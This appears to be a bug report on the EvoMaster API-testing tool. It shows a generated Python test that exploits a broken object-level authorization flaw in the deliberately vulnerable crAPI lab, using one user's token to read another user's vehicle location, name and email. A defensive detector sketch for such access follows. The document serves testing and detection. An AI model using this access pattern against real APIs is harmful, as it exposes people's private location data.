Description
The /identity/api/v2/vehicle/{vehicleId}/location endpoint is vulnerable to BOLA attacks as stated in Challenge 1. To test whether EvoMaster can find the vulnerability, I've run it (v4.0.0) on crAPI for 5 minutes. As a result, it could write a test that generates a valid request for the vulnerable endpoint with a valid vehicleId:
```python
import requests
import timeout_decorator


class TestCrapi:
    # Stand-in for the EvoMaster-generated test class; baseUrlOfSut is the base
    # URL of the crAPI instance under test (placeholder value, set it yourself).
    baseUrlOfSut = "http://CRAPI_HOST:PORT"

    # Calls:
    # (200) GET:/identity/api/v2/vehicle/{vehicleId}/location
    @timeout_decorator.timeout(60)
    def test_33_get_on_location_returns_object(self):
        # log in as user1 and keep the bearer token for the next call
        token_user1 = "Bearer "
        headers = {}
        headers["content-type"] = "application/json"
        body = " { " + \
            " \"email\": \"[email protected]\", " + \
            " \"password\": \"Password3!\" " + \
            " } "
        res_user1 = requests \
            .post(self.baseUrlOfSut + "/identity/api/auth/login",
                  headers=headers, data=body, allow_redirects=False)
        token_user1 = token_user1 + res_user1.json()["token"]

        # request another user's vehicle location with user1's token
        headers = {}
        headers["Authorization"] = token_user1  # user1
        headers['Accept'] = "application/json"
        res_0 = requests \
            .get(self.baseUrlOfSut + "/identity/api/v2/vehicle/cd515c12-0fc1-48ae-8b61-9230b70a845b/location",
                 headers=headers, timeout=60)
        assert res_0.status_code == 200
        assert "application/json" in res_0.headers["content-type"]
        assert res_0.json()["carId"] == "cd515c12-0fc1-48ae-8b61-9230b70a845b"
        assert res_0.json()["vehicleLocation"]["latitude"] == "31.284788"
        assert res_0.json()["vehicleLocation"]["longitude"] == "-92.471176"
        assert res_0.json()["fullName"] == "Pogba"
        assert res_0.json()["email"] == "[email protected]"
```
EvoMaster has passed the challenge by finding the exposed valid vehicle ID in the /community/api/v2/community/posts/{postId} endpoint, and it could access the vehicle ID (cd515c12-0fc1-48ae-8b61-9230b70a845b) of another user (Pogba). However, as seen in the following image, it couldn't raise the fault code (206) related to missed authorization checks (BOLA).

This is a false-negative case, and the algorithm can be improved to resolve this problem.
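The missing oracle described in this issue, as an added sketch that is not EvoMaster's or crAPI's own code: it walks a recorded trace of calls and flags a 2xx response that hands one principal another principal's object, either because the body names a different owner (the `email` field in the location response above) or because the same id was earlier attributed to another principal. The `Call` record, the `detect_bola` function and the e-mail addresses are assumptions; the vehicle id and the fault code 206 come from the issue.

```python
import re
from dataclasses import dataclass, field

UUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)
BOLA_FAULT = 206  # fault code the issue expects for a missed authorization check


@dataclass
class Call:
    principal: str  # login email behind the bearer token used for this call
    path: str
    status: int
    body: dict = field(default_factory=dict)


def detect_bola(calls, owner_keys=("email",)):
    """Return (path, requester, owner, fault) for each 2xx response that hands
    one principal an object attributed to another. Signal 1: the body names an
    owner (crAPI's location body carries `email`) who is not the requester.
    Signal 2: an id in the path was earlier attributed to another principal, so
    a body without an owner field is still caught (first-sighting attribution
    is a heuristic)."""
    owners = {}  # object id -> principal it is attributed to
    findings = []
    for c in calls:
        if not 200 <= c.status < 300:
            continue  # a denied or failed call exposes nothing
        ids = set(UUID_RE.findall(c.path))
        owner = next((c.body[k] for k in owner_keys if k in c.body), None)
        if owner is None:
            owner = next((owners[i] for i in ids if i in owners), c.principal)
        for i in ids:
            owners.setdefault(i, owner)
        if owner != c.principal:
            findings.append((c.path, c.principal, owner, BOLA_FAULT))
    return findings


# Constructed trace: the vehicle id is the one quoted in the issue, the e-mail
# addresses are placeholders.
POGBA, USER1 = "pogba@example.invalid", "user1@example.invalid"
VEHICLE = "cd515c12-0fc1-48ae-8b61-9230b70a845b"
PATH = f"/identity/api/v2/vehicle/{VEHICLE}/location"
TRACE = [
    Call(POGBA, PATH, 200, {"carId": VEHICLE, "email": POGBA}),  # owner: fine
    Call(USER1, PATH, 200, {"carId": VEHICLE, "fullName": "Pogba",
                            "email": POGBA}),  # the issue's test, should be 206
    Call(USER1, PATH, 200, {"carId": VEHICLE}),  # no owner field: signal 2
    Call(USER1, PATH, 403),  # what a fixed service answers: no finding
]
```

Running `detect_bola(TRACE)` yields two fault-206 findings for user1 and none for the owner's own call or the 403.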